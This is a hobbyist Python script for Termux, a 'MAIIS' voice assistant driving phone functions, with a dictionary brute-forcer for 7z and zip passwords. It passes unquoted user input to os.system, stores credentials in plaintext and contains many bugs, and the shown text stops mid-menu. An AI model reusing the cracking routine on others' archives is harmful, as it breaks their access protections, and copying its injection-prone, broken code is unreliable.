#!/usr/bin/python
from getpass import getpass
import os
import time
import datetime
import random
import webbrowser
import http.cookiejar as cookielib
import requests
import threading
from bs4 import BeautifulSoup
import sys
speak = ' termux-tts-speak '

def archiver():
	
	def maiinn():
		print('WORNING : Be cairefull bruteforce attack is avilable only in 7z or zip file becouse only 7z and zip file can contain password other not...')
		print('''
	
	1. 7z bruteforce attack
	
	2. zip bruteforce attack
	
	3. rar
	
	4. tar.gz
	
	5. tar.bz2
	
	6. tar.xz
	
	7. tar
	
	8. tar.gz
	
	9. gz
	
	10. 7z file without password
	
	11. zip file without password
	
	12. exit
		''')
		
		number_for_brut_arc=int(input('insert the no : '))
		os.system('clear')
		if number_for_brut_arc==1:
			main1()
		elif number_for_brut_arc==2:
			main2()
		elif number_for_brut_arc==3:
			path_of_rar_file=input('insert the full path of the rar file with name : ')
			os.system('unrar x '+path_of_rar_file)
			# os.system('clear')
			print('Done....')
		elif number_for_brut_arc==4:
			path_of_targz_file=input('input the full path of tar.gz file with name : ')
			os.system('tar -xf '+path_of_targz_file)
			# os.system('clear')
			print('Done....')
		elif number_for_brut_arc==5:
			path_of_tarbz2_file=input('insert the tar.bz2 file path with name : ')
			os.system('tar -xjf '+path_of_tarbz2_file)
			# os.system('clear')
			print('Done.....')
		elif number_for_brut_arc==6:
			path_of_tarxz_file=input('insert the full path of tar.xz file with name : ')
			os.system('tar -xJf '+path_of_tarxz_file)
			# os.system('clear')
			print('Done......')
		elif number_for_brut_arc==7:
			path_of_tar_file=input('Insert the full path of tar file with name : ')
			os.system('tar -xvf '+path_of_tar_file)
			# os.system('clear')
			print('Done......')
		elif number_for_brut_arc==8:
			path_of_targz_file=input('insert the path of tar.gz file with name : ')
			os.system('tar -xzf '+path_of_targz_file)
			# os.system('clear')
			print('Done......')
		elif number_for_brut_arc==9:
			path_of_gz_file=input('Insert the full path of gz file with name : ')
			os.system('gunzip '+path_of_gz_file)
			# os.system('clear')
			print('Done......')
		elif number_for_brut_arc==10:
			path_of_7z_fi=input('Insert the full path of 7z file : ')
			os.system('7z x '+path_of_7z_fi)
			# os.system('clear')
			print('Done......')
		elif number_for_brut_arc==11:
			path_of_zip_fi=input('Insert the full path of zip file with name :')
			os.system('unzip '+path_of_zip_fi)
			# os.system('clear')
			print('Done......')
		elif number_for_brut_arc==12:
			# os.system('clear')
			print('ok sir .....')
			time.sleep(1)
			exit()
		else:
			exit()
		
		
		
	def main1():
		txt_file_path=input(yellow+'insert the full path of txt file : '+end+green)
		path_of_7z = input(blue+'Insert the path of 7z file : '+end+green)
		name_of_7z = input(green+'Input the name of the 7z file : '+end+yellow)
		os.system('clear')
		print('if it contain spaces the type ' ' between name .... ')
		name_inside=input(green+'input the name of the one of the file inside it : '+yellow)
		os.chdir(path_of_7z)
		k=0
		while True:
			with open(txt_file_path , 'r') as op:
				f = op.readlines()
				jo=(f[k])
				kq=jo.replace('\n', '')
				print(blue+'trying password '+end+green+kq+end+yellow+'......'+end)
				time.sleep(1)
				f == op.readlines()
				os.system('7z x '+name_of_7z+' -p'+kq)
				if not os.path.exists(path_of_7z+'/'+name_inside):
					os.system('clear')
					print(read+'trying agan.....'+end)
					time.sleep(1)
				else:
					os.system('clear')
					print('ok its done.....')
					print(green+'The password is : '+end+read+kq+end)
					op.close()
					return maiinn()
					break
				k +=1;
				time.sleep(1)
	
	
	def main2():
		path_of_zip_file=input(yellow+'Insert the path of zip file : '+end+green)
		os.chdir(path_of_zip_file)
		name_of_zip_file=input(blue+'Insert the name of the zip file with full name : '+end+green)
		os.system('clear')
		print(read+'if it contain spaces the type ' ' between name .... '+end)
		nam_inside_zip=input(green+'Insert the one file name inside the zip file : '+end+blue)
		if not os.path.exists(path_of_zip_file+'/'+name_of_zip_file):
			print(read+'Sorry The Path dose Not exist'+end)
		else:
			print(green+'Pleas wait....'+end)
			p=0
			txt_file_pa=input(green+'Input the full Path of Txt file : '+end+yellow)
			while True:
				with open(txt_file_pa , 'r') as opp:
					fl = opp.readlines()
					jio=(fl[p])
					koq=jio.replace('\n', '')
					print(koq)
					time.sleep(1)
					fl == opp.readlines()
					os.system('unzip -P '+koq+' '+name_of_zip_file)
					if not os.path.exists(path_of_zip_file+'/'+nam_inside_zip):
						os.system('clear')
						print(read+'trying agan.....'+end)
						time.sleep(1)
					else:
						os.system('clear')
						print(green+'Ok its don....'+end)
						print(green+'The password is : '+end+read+koq+end)
						opp.close()
						return maiinn()
						break
					p +=1;
					time.sleep(1)
	os.system('clear')
	maaiinn()
					
	# os.system('clear')


def reqcheck():
	blink = '\33[6m'
	bold = '\33[1m'
	selected = '\33[7m'
	url = '\33[4m'
	read='\033[31m'
	green='\033[32m'
	yellow='\033[93m'
	blue='\033[34m'
	bold='\033[01m'
	underline='\033[04m'
	voilet = '\33[35m'
	end = '\33[0m'
	try:
		os.system('clear')
		print(green+'Please Wait Checking Requirenment .........'+end)
		done = 'false'
		#here is the animation
		def animate():
			i =0
			while done == 'false':
				sys.stdout.write(green+'\rloading |'+end)
				time.sleep(0.1)
				sys.stdout.write(yellow+'\rloading /'+end)
				time.sleep(0.1)
				sys.stdout.write(read+'\rloading -'+end)
				time.sleep(0.1)
				sys.stdout.write(voilet+'\rloading \\'+end)
				time.sleep(0.1)
				if i ==13:
					break
				i =i+1
			sys.stdout.write('\r ')
		
		
		
		if not os.path.exists('/data/app/com.termux.api-1/base.apk'):
			print(read + 'the termux api is not installed pleas install it by playstore'+end)
			exit()
		
		print(green+'Checking pakges pleas wait...'+end)
		if not os.path.exists('/data/data/com.termux/files/usr/bin/python'):
			print(read + 'python is not installed pleas install it by typing apt install python ...'+ end)
			exit()
		
			
		if not os.path.exists('/data/data/com.termux/files/usr/bin/mpv'):
			print(read + 'media playe is not installed pleas install it by typing apt install mpv'+end)
			exit()
		
			
		if not os.path.exists('/data/data/com.termux/files/usr/bin/python2'):
			print(read + 'python2 is not installed pleas install it by typing apt install python ...'+end)
			exit()
		
			
		if not os.path.exists('/data/data/com.termux/files/usr/bin/figlet'):
			print(read + 'figlet is not installed pleas install it by typing apt install figlet'+end)
			exit()
		
		if not os.path.exists('/data/data/com.termux/files/usr/bin/nano'):
			print(read + 'nano is not installed please install it by typing apt install nano'+end)
			exit()
		
			
		if not os.path.exists('/data/data/com.termux/files/usr/bin/fortune'):
			print(read + 'fortune is not installed pleas install it by typing apt install fortune'+end)
			exit()
		
			
		if not os.path.exists('/data/data/com.termux/files/usr/bin/python'):
			print(read + 'toilet is not installed pleas install it by typing apt install toilet'+end)
			exit()
		
			
		if not os.path.exists('/data/data/com.termux/files/usr/bin/pip'):
			print(read + 'pip is not installed pleas install it by typing apt install pip'+end)
			exit()
		
			
		if not os.path.exists('/data/data/com.termux/files/usr/lib/python3.7/random.py'):
			print(read + 'random is not installed pleas install it by typing pip install random'+end)
			end()
		
			
		if not os.path.exists('/data/data/com.termux/files/usr/lib/python3.7/webbrowser.py'):
			print(read + 'webbrowser is not installed pleas install it by typing apt install webbrowser'+end)
			end()
			
		if not os.path.exists('/data/data/com.termux/files/usr/lib/python3.7/http/cookiejar.py'):
			print(read + 'cookiejar is not installed pleas install it by typing pip install http.cookiejar'+end)
			end()
			
		if not os.path.exists('/data/data/com.termux/files/usr/lib/python3.7/threading.py'):
			print(read + 'threading is not installed pleas install it by typing apt install threading'+end)
			end()
			
		if not os.path.exists('/data/data/com.termux/files/usr/bin/cowsay'):
			print(read + 'cowsay is not installed please install it by typing apt install cowsay'+end)
			end()
			
		if not os.path.exists('/data/data/com.termux/files/usr/bin/fortune'):
			print(read + 'fortune is not installed pleas install it by typing apt install fortune'+end)
			exit()
			
		animate()
		pauser()
	# except Exception:
		#print(read + 'pleas wait do not type anything'+end)
		#time.sleep(2)
		#input(read + 'press any key to continue : '+end)
		#return reqcheck()

	except KeyboardInterrupt:
		print(read+'pleas wait do not type ctrl + c '+end)
		time.sleep(2)
		input(read+'press any key to continue : '+end)
		return reqcheck()
def pauser(): # maiis password type agan and agan earror start from here
	try:
		def password():
			blink = '\33[6m'
			bold = '\33[1m'
			selected = '\33[7m'
			url = '\33[4m'
			read='\033[31m'
			green='\033[32m'
			yellow='\033[93m'
			blue='\033[34m'
			bold='\033[01m'
			underline='\033[04m'
			voilet = '\33[35m'
			end = '\33[0m'
			wrong_password_try = 0
			i = 0
			while True:
				try:
					if wrong_password_try ==0:
						os.system('clear')
					with open('/sdcard/Android/data/com.maiis.main.files/usp.txt' , 'r') as op:
						sa = (op.read().find(str('=')))
						op.seek(sa + 2)
						usr_rl = (op.readline())
						sbo = (op.readline().find(str('@')))
						op.seek(sbo + 22)
						passw_rl = (op.readline())
						op.close()
						os.chdir('/sdcard/Android/data/com.maiis.main.files/')
						with open('wp.txt' , 'r') as ol:
							read = ol.readline()
							uy =''.join(x for x in read if x.isdigit())
					
							if uy =='8': # uy is normally in the form of 0 int
								print(read+'pleas confirm your identy'+end)
								confirm_id = input(read+'enter your passcoad : '+end)
								ol.close()
								
			
								with open('pc.txt' , 'r') as pc:
									pco = pc.readline()
									if pco == confirm_id:
										print('')
										with open('/sdcard/Android/data/com.maiis.main.files/wp.txt' , 'w') as wr:
											wr.writelines('0')
										wr.close()
										print(green+'ok id confirmed now restart your maiis'+end)
										break
									else:
										print(read+'pleas try agan id not confirmed'+end)
										time.sleep(1)
									
			
							else:
								ol.close()
								os.chdir('/sdcard/Android/data/com.maiis.main.files/')
								with open('wp.txt' , 'r') as op:
									rea = op.readline()
									i = ''.join(x for x in rea if x.isdigit())
									op.close()
									os.chdir('/sdcard/Android/data/com.maiis.main.files/')
									with open('wp.txt' , 'w') as ip: # trying passwords save to # # # # #  file 
										user=input(yellow+'enter username : '+end+green)
										passw = getpass(yellow+'enter password : '+end)
										os.system('clear')
										i = int(i)
										i = i+1
										io = str(i)
										ip.writelines(io)
										if i ==9:
											print(read+'too many attamts pleas try agan'+end)
											break
										ip.close()
										wrong_password_try = wrong_password_try + 1
										if user==usr_rl+'\n' or passw==passw_rl:
											# wp text file
											with open('wp.txt' , 'w') as wpo: # writing 0 in wp.txt file
												wpo.writelines('0')
												wpo.close()
											maiismain()
										elif wrong_password_try ==1:
											print(read+'Be caire full if you try wrong password agan and agan your system could crash'+end)
										elif wrong_password_try ==8:
											print(read+'sorry too many attampts pleas try agan later'+end)
											break
											exit()
				except KeyboardInterrupt:
					print('')
					os.system('clear')
					with open('wp.txt' , 'w') as dobbty:
						dobbty.writelines('0')
					dobbty.close()
					password()
		password()
	except KeyboardInterrupt:
		print('')
		os.system('clear')
		password()
def maiismain(): # main maiis section start from here 
	os.system('clear')
	blink = '\33[6m'
	bold = '\33[1m'
	selected = '\33[7m'
	url = '\33[4m'
	read='\033[31m'
	green='\033[32m'
	yellow='\033[93m'
	blue='\033[34m'
	bold='\033[01m'
	underline='\033[04m'
	voilet = '\33[35m'
	end = '\33[0m'
	
	def logo1():
		print("""
		
	 __  __    _    ___ ___ ____
	|  \/  |  / \  |_ _|_ _/ ___|
	| |\/| | / _ \  | | | |\___ \
	| |  | |/ ___ \ | | | | ___) |
	|_|  |_/_/   \_\___|___|____/
		
		
		""")
	
	def logo2():
		print("""
	
	 m    m   mm   mmmmm  mmmmm   mmmm
	 ##  ##   ##     #      #    #"   "
	 # ## #  #  #    #      #    "#mmm
	 # "" #  #mm#    #      #        "#                         
	 #    # #    # mm#mm  mm#mm  "mmm#"
	
	
	
	
	
	
		""")
	def logo3():
		print("""
	
	
	   __________________
	 < WELLCOME TO MAIIS >
	 -------------------
	        \   ^__^
	         \  (oo)\_______
	            (__)\       )\/\
	                ||----w |
	                ||     ||
	
	
		""")
		
	def logo4():
		print("""
		
	_______
	< MAIIS >
	 -------
	     \
	                                   .::!!!!!!!:.
	  .!!!!!:.                        .:!!!!!!!!!!!!
	  ~~~~!!!!!!.                 .:!!!!!!!!!UWWW$$$
	      :$$NWX!!:           .:!!!!!!XUWW$$$$$$$$$P
	      $$$$$##WX!:      .<!!!!UW$$$$"  $$$$$$$$#
	      $$$$$  $$$UX   :!!UW$$$$$$$$$   4$$$$$*
	      ^$$$B  $$$$\     $$$$$$$$$$$$   d$$R"
	        "*$bd$$$$      '*$$$$$$$$$$$o+#"
	             
	
		""")
	# while true; do echo "$(date '+%D %T' | toilet -f term -F border --gay)"; sleep 1; clear; done
	logo1 = ('cowsay WELLCOME TO MAIIS| toilet --metal -f term')
	logo2 = ('toilet --metal "MAIIS"')
	logo3 = ('cowsay -f eyes MAIIS IS WATCHING YOU| toilet --metal -f term')
	logo4 = ('fortune')
	
	ranlogo = random.choice((logo1,logo2,logo3,logo4))
	os.system(ranlogo)
	
	timenow = str(datetime.datetime.now())
	
	print( yellow + "------------"+(timenow)+"------------")
	hours = int(datetime.datetime.now().hour)
	# os.system('termux-tts-speak pleas wait starting maiis')
	if hours >=0 and hours<12:
		os.system('termux-tts-speak good morning sir. my name is maiis and i am your personal assistant what can i do for you')
	elif hours >=10 and hours<6:
		os.system('termux-tts-speak do you want to heare bhajan songs')
		bhajan_song_start = input(green+'do you want to heare bhajan y/n : '+end)
		if bhajan_song_start == "y" or bhajan_song_start == "Y":
			os.system('termux-tts-speak ok sir enjoy bhajan songs')
			print( green + '''
keybordkey          action
 p                   for pause
 j                   for subtitle
 up                  reverse
 down                frount
 back                backward
 front               for frontward
 l                   for loop
 s                   screenshot not working in all devices
 i                   for information about song
 u                   for ASS subtitle
 t                   for increase subposition
 r                   for decrease subposition
 e                   for increasing panscane
 w                   for decreasing panscane
 d                   for deintralace
 z                   for subdelay decrease
 x                   for increase subdelay
 v                   for selection of subtitle
 m                   for mute
 q                   for quit
				''')
			os.system('mpv /sdcard/Maiis/bhajansongs')
			os.system('clear')
		else:
			os.system('termux-tts-speak ok sir as your wish')
			print(yellow+"ok sir as your wish"+end)
			time.sleep(2)
			os.system('clear')
	elif hours >=12 and hours <18:
		os.system('termux-tts-speak good afternoon sir.  my name is maiis and i am your personal assistant what can i do for you')
	else:
		os.system('termux-tts-speak good evening sir. my name is maiis and i am your personal assistant what can i do for you')
	print("")
	print("")
	print("")
	os.chdir('/sdcard/Android/data/com.maiis.main.files/')
	with open('find.txt' , 'r') as op :
		pass
		try:
			month = str(datetime.datetime.now().month)
			day = str(datetime.datetime.now().day)
			mondayi = (day+month)
			os.chdir('/sdcard/Android/data/com.maiis.main.files/')
			with open('find.txt' , 'r+') as op :
				find = op.read().find(str(day))
				seek = op.seek(find)
				reado = op.readline()
				numberio =''.join(x for x in reado if x.isdigit())
				if numberio==mondayi:
					seek2 = op.seek(seek - 12)
					print(green+"birthday found "+op.readline(),end=' ')
				else:
					print("\033[31m nop no birthday found today ")
			op.close()
		except Exception:
			print(green+"No date of birth found today"+end)
	print("")
	print("")
	print("")
	time.sleep(1)
	print( voilet + underline + blink + bold + "Type help to show all command list" + end)
	while True:
		try:
			
			print(read + "----------- MAIIS V-1.3 CREATED BY 5M4CK3R -----------"+end)
			c=input(blue + "MAIIS1-:"+end+green)
			if c=="hellow maiis":
				os.system('termux-tts-speak hellow sir what can do for you')
			elif c=="show my battry status":
				os.system('termux-tts-speak ok sir showing battry status ')
				os.system('termux-battery-status')
			elif c=="set termux brigthness":
				os.system('termux-tts-speak enter the amount of brightness')
				amount_brightness=input(green+"insert amount between 0 to 255 :"+end)
				os.system('termux-brightness'+' '+amount_brightness)
				os.system('termux-tts-speak brightness was set')
				os.system('clear')
			elif c=="show call logs":
				os.system('termux-tts-speak please wait showing call logs')
				os.system('termux-call-log ')
			elif c=="show me about my camara":
				os.system('termux-tts-speak pleas waith showin all information about your camara')
				os.system('termux-camera-info')
			elif c=="show my copied text":
				os.system('please wait showing copied text')
				os.system('termux-clipboard-get')
			elif c=="copy text":
				text_copy=input(yellow+"enter text which you want to copy :"+end)
				os.system('termux-clipboard-set'+' '+text_copy)
				os.system('termux-tts-speak the text was copied')
			elif c=="show my all contect list":
				os.system('termux-tts-speak please wait showing contect list')
				os.system('termux-contact-list')
			elif c=="print dilog":
				os.system('termux-tts-speak enter dilog to print')
				dilog_to=input(green+"input dilog to print :"+end)
				os.system('termux-dialog -for dilog'+' '+dilog_to)
			elif c=="download":
				os.system('termux-tts-speak enter url to download')
				url_download=input(yellow+"input url :"+end)
				os.system('termux-download'+' '+url_download)
			elif c=="get finger info":
				os.system('termux-tts-speak please enroll a fingerprint')
				os.system('termux-fingerprint')
			elif c=="show infrared frequencies":
				os.system('termux-tts-seak pleas wait showing')
				os.system('termux-infrared-frequencies')
			elif c=="show my location":
				os.system("termux-tts-speak pleas wait showing current location")
				os.system('termux-location')
			elif c=="play music":
				os.system('termux-tts-speak pleas enter a path and a name of music to play')
				music_path=input(read+"enter a path of music :"+end)
				os.chdir(music_path)
				os.system('ls')
				music_name=input(green+"please enter the name of music with dobule coads :"+end)
				os.system('termux-media-player'+' '+'play'+' '+music_path+music_name)
				os.system('termux-tts-speak you can type pause music to pause or stop to stop music and after pause you can play it agan')
			elif c=="pause":
				os.system('termux-media-player pause')
			elif c=="resume":
				os.system('termux-media-player play')
			elif c=="stop":
				os.system('termux-media-player stop')
				os.system('termux-tts-speak music was stopped')
				os.system('clear')
			elif c=="scane file":
				os.system('termux-tts-speak pleas wait scaning media')
				media_scane=input(green+"input file name to find :"+end)
				os.system('termux-media-scan -v -r'+' '+media_scane)
			elif c=="record mic":
				os.system('termux-tts-speak pleas wait sir')
				rec_lim=input(yellow+"enter time in sec 0 for unlimited :"+end)
				# recording
				os.system('termux-microphone-record'+' '+'-l'+' '+int(rec_lim))
				# exp in notification 
			elif c=="show notification":
				os.system('termux-tts-speak sir pleas be patiend')
				os.system('termux-notification')
			#exp in notification
			elif c == "y":
				print(" ")
			elif c=="remove notification":
				os.system('termux-notification-remove')
				os.system('termux-tts-speak notification removed')
			elif c=="show live sensor":
				os.system('termux-tts-speak pleas wait showing libe sensor')
				os.system('termux-sensor')
			elif c=="":
				print('')
			elif c=="send sms":
				os.system('termux-tts-speak please enter a number to sed a sms')
				name_sms=input(voilet+'number if more then one then type  , :'+end)
				text_sms=input(blue+'input text to send :'+end)
				os.system('termux-sms-send'+' '+'-n'+name_sms+' '+text_sms)
			elif c=="show sms":
				os.system('termux-tts-speak pleas wait showing sms')
				os.system('termux-sms-list')
			# calling section start here
			elif c=="make a call":
				try:
					write_person_name = input(green+"enter name or number of person : "+end)
					os.chdir('/sdcard/Android/data/com.maiis.main.files/')
					with open('datab.txt' , 'r') as oi :
						pass
						db_find = oi.read().find(write_person_name)
						s=oi.seek(db_find)
						db = (oi.readline())
						num_person = ''.join(x for x in db if x.isdigit())
						print(green+"calling to "+' '+num_person+end)
						os.system('termux-telephony-call'+' '+num_person)
				except ValueError:
					print(green+"calling to "+' '+write_person_name+end)
					os.system('termux-telephony-call'+' '+write_person_name)
			# calling section end here
					oi.close()
			elif c=="show info about cell":
				os.system('termux-tts-speak pleas waith showing all information about cell')
				os.system('termux-telephony-cellinfo')
			elif c=="show device info":
				os.system('termux-tts-speak please wait showing all info about device')
				os.system('termux-telephony-deviceinfo')
			elif c=="show toast":
				os.system('termux-tts-speak pleas enter a text to show toase')
				toast_no=input(yellow+"write text :"+end)
				os.system('termux-toast notification'+' '+toast_no)
			elif c=="turn torch on":
				os.system('termux-torch on')
				os.system('termux-tts-speak torch was turned on')
			elif c=="turn torch off":
				os.system('termux-torch off')
				os.system('termux-tts-speak torch was turned off')
			elif c=="torch sos":
				os.system('termux-torch on')
				time.sleep(1)
				os.system('termux-torch off')
				time.sleep(1)
				os.system('termux-torch on')
				time.sleep(3)
				os.system('termux-torch off')
			elif c=="vibrate":
				os.system('termux-tts-speak pleas enter a time')
				vib_time=input(green+"input time :")
				os.system('termux-vibrate'+' '+'-d'+' '+vib_time+' '+'-f')
				os.system('termux-tts-speak vibrated')
			elif c=="show volume":
				os.system('termux-tts-speak ok sir pleas wait')
				os.system('termux-volume')
			elif c=="set wallpaper":
				os.system('termux-tts-speak pleas wait')
				set_wall=input(yellow+"what do you want to chuse if url then type u other wise p :")
				if set_wall=="u":
					url_main=input(url+"input url :")
					url_set_wall=input(bold+green+"do you want to set this wallpaper in your lock screen y/n :")
					if url_set_wall=="y":
						os.system('termux-wallpaper'+' '+'-u'+' '+url_main+' '+'-l')
					elif url_set_wall=="n":
						os.system('termux-wallpaper'+' '+'-u'+' '+url_main)
					else:
						os.system("termux-tts-speak enter a valif valiue")
				elif set_wall=="p":
					img_p_input=input(blue+"input the path of the image with full name :")
					img_p_sel=input("do you want to set the image in your lock screen image y/n :")
					if img_p_sel=="y":
						os.system('termux-wallpaper -f'+' '+img_p_input+' '+'-l')
					elif img_p_sel=="n":
						os.system('termux-wallpaper -f'+' '+img_p_input)
					else:
						os.system('termux-tts-speak pleas enter a valid option')
				# os.system('clear')
				os.system('termux-tts-speak wallpaper set')
			elif c=="show wifi connection info":
				os.system('termux-tts-speak please wait showing')
				os.system('termux-wifi-connectioninfo')
			elif c=="turn wifi on":
				os.system('termux-tts-speak wait sir turning wifi on')
				os.system('termux-wifi-enable true')
			elif c=="turn wifi off":
				os.system('termux-tts-speak pleas wait turning wifi off')
				os.system('termux-wifi-enable false')
			elif c=="show near by wifi":
				os.system('termux-tts-speak pleas wait showing near by wifi')
				os.system('termux-wifi-scaninfo')
			elif c=="show sms list":
				os.system('termux-tts-speak pleas wait showing sms list')
				os.system('termux-sms-list')
			# by
			# hii
			elif c=="hellow how are you":
				os.system('termux-tts-speak i am fine sir how about you')
				os.system('clear')
			elif c=="i am also fine":
				os.system('termux-tts-speak ok sir')
				os.system('clear')
			elif c=="how i am looking":
				os.system('termux-tts-speak you are looking vaery smart sir')
			elif c=="wo to ma pahla sa he hu":
				os.system('termux-tts-speak yes sir i know')
			elif c=="hellow":
				os.system('termux-tts-speak hellow sir my name is maiis what can i do for you')
			elif c=="i love you":
				os.system('termux-tts-speak love you too sir')
			elif c=="could you please silant":
				os.system('termux-tts-speak sir i am talking machine i never sit silent')
			elif c=="kya tum kabhe bahar gyi ho":
				os.system('termux-tts-speak sir i am very exited to go away i will start packing bag go away')
			elif c=="ma kasa lg raha hu":
				os.system('termux-tts-speak sir you are looking very osme and sexy')
			# termux music command stsrt from here
			elif c=="play 3d songs":
				os.system('termux-tts-speak ok sir plug in your earphons and enjoy 3d songs')
				print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
v                   for selection of subtitle
m                   for mute
q                   for quit
				''')
				os.system('mpv /sdcard/Maiis/3dsongs')
				os.system('clear')
			elif c=="play sad songs":
				os.system('termux-tts-speak ok sir as your mood enjoy')
				print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
v                   for selection of subtitle
m                   for mute
q                   for quit
				''')
				os.system('mpv /sdcard/Maiis/sadsongs')
				os.system('clear')
			elif c=="play pop songs":
				os.system('termux-tts-speak ok sir enjoy pop songs')
				print( green + '''
	keybordkey          action
	 p                   for pause
	 j                   for subtitle
	 up                  reverse
	 down                frount
	 back                backward
	 front               for frontward
	 l                   for loop
	 s                   screenshot not working in all devices
	 i                   for information about song
	 u                   for ASS subtitle
	 t                   for increase subposition
	 r                   for decrease subposition
	 e                   for increasing panscane
	 w                   for decreasing panscane
	 d                   for deintralace
	 z                   for subdelay decrease
	 x                   for increase subdelay
	 v                   for selection of subtitle
	 m                   for mute
	 q                   for quit
				''')
				os.system('mpv /sdcard/Maiis/popsongs')
				os.system('clear')
			elif c=="play bhajan songs":
				os.system('termux-tts-speak ok sir enjoy bhajan songs')
				print( green + '''
	keybordkey          action
	 p                   for pause
	 j                   for subtitle
	 up                  reverse
	 down                frount
	 back                backward
	 front               for frontward
	 l                   for loop
	 s                   screenshot not working in all devices
	 i                   for information about song
	 u                   for ASS subtitle
	 t                   for increase subposition
	 r                   for decrease subposition
	 e                   for increasing panscane
	 w                   for decreasing panscane
	 d                   for deintralace
	 z                   for subdelay decrease
	 x                   for increase subdelay
	 v                   for selection of subtitle
	 m                   for mute
	 q                   for quit
				''')
				os.system('mpv /sdcard/Maiis/bhajansongs')
				os.system('clear')
			elif c=="play video song":
				os.system('termux-tts-speak ok sir playing video as a song')
				print( green + '''
	keybordkey          action
	 p                   for pause
	 j                   for subtitle
	 up                  reverse
	 down                frount
	 back                backward
	 front               for frontward
	 l                   for loop
	 s                   screenshot not working in all devices
	 i                   for information about song
	 u                   for ASS subtitle
	 t                   for increase subposition
	 r                   for decrease subposition
	 e                   for increasing panscane
	 w                   for decreasing panscane
	 d                   for deintralace
	 z                   for subdelay decrease
	 x                   for increase subdelay
	 v                   for selection of subtitle
	 m                   for mute
	 q                   for quit
				''')
				os.system('clear')
				os.system('mpv /sdcard/Maiis/video')
			elif c=="play panjabi songs":
				os.system('termux-tts-speak ok sir i also want to heare panjabi songs thank god you play')
				print( green + '''
	keybordkey          action
	 p                   for pause
	 j                   for subtitle
	 up                  reverse
	 down                frount
	 back                backward
	 front               for frontward
	 l                   for loop
	 s                   screenshot not working in all devices
	 i                   for information about song
	 u                   for ASS subtitle
	 t                   for increase subposition
	 r                   for decrease subposition
	 e                   for increasing panscane
	 w                   for decreasing panscane
	 d                   for deintralace
	 z                   for subdelay decrease
	 x                   for increase subdelay
	 v                   for selection of subtitle
	 m                   for mute
	 q                   for quit
				''')
				os.system('mpv /sdcard/Maiis/panjabisongs')
				os.system('clear')
			elif c=="play other songs":
				os.system('termux-tts-speak ok sir enjoy songs and do not miss to talk me agan')
				print( green + '''
	keybordkey          action
	 p                   for pause
	 j                   for subtitle
	 up                  reverse
	 down                frount
	 back                backward
	 front               for frontward
	 l                   for loop
	 s                   screenshot not working in all devices
	 i                   for information about song
	 u                   for ASS subtitle
	 t                   for increase subposition
	 r                   for decrease subposition
	 e                   for increasing panscane
	 w                   for decreasing panscane
	 d                   for deintralace
	 z                   for subdelay decrease
	 x                   for increase subdelay
	 v                   for selection of subtitle
	 m                   for mute
	 q                   for quit
				''')
				os.system('mpv /sdcard/Maiis/othersongs')
				os.system('clear')
			elif c=="play eng songs":
				os.system('termux-tts-speak ok sir playing english songs')
				print( green + '''
	keybordkey          action
	 p                   for pause
	 j                   for subtitle
	 up                  reverse
	 down                frount
	 back                backward
	 front               for frontward
	 l                   for loop
	 s                   screenshot not working in all devices
	 i                   for information about song
	 u                   for ASS subtitle
	 t                   for increase subposition
	 r                   for decrease subposition
	 e                   for increasing panscane
	 w                   for decreasing panscane
	 d                   for deintralace
	 z                   for subdelay decrease
	 x                   for increase subdelay
	 v                   for selection of subtitle
	 m                   for mute
	 q                   for quit
				''')
				os.system('mpv /sdcard/Maiis/eng')
			elif c=="play loop song":
				os.system(speak+'ok sir pleas chuse a number ')
				print(voilet+'''
				
	1. 3dsongs
	
	2. sadsongs
	
	3. eng
	
	4. video
	
	5. popsongs
	
	6. Bhajan
	
	7. panjabi
	
	8. othersongs


				'''+end)
				loop_sd =int(input('Enter no. of playlist : '))
				os.chdir('/sdcard/Maiis/')
				if loop_sd ==1:
					os.chdir('3dsongs')
					os.system('ls')
					loop_sn =input('Enter the name of song : ')
					os.system(speak+' playing '+loop_sn+' song')
					print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
v                   for selection of subtitle
m                   for mute
q                   for quit
					''')
					os.system('mpv '+loop_sn+' --loop')
				if loop_sd ==2:
					os.chdir('sadsongs')
					os.system('ls')
					loop_sn =input('Enter the name of song : ')
					os.system(speak+' playing '+loop_sn+' song')
					print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
v                   for selection of subtitle
m                   for mute
q                   for quit
					''')
					os.system('mpv '+loop_sn+' --loop')
				elif loop_sd==3:
					os.chdir('eng')
					os.system('ls')
					loop_sn =input('Enter the name of song : ')
					os.system(speak+'playing '+loop_sn+' song')
					print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
v                   for selection of subtitle
m                   for mute
q                   for quit
					''')
					os.system('mpv '+loop_sn+' --loop')
				elif loop_sd==4:
					os.chdir(loop_sd)
					os.system('ls')
					loop_sn =input('Enter the name of song : ')
					os.system(speak+'playing '+loop_sn+' song')
					print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
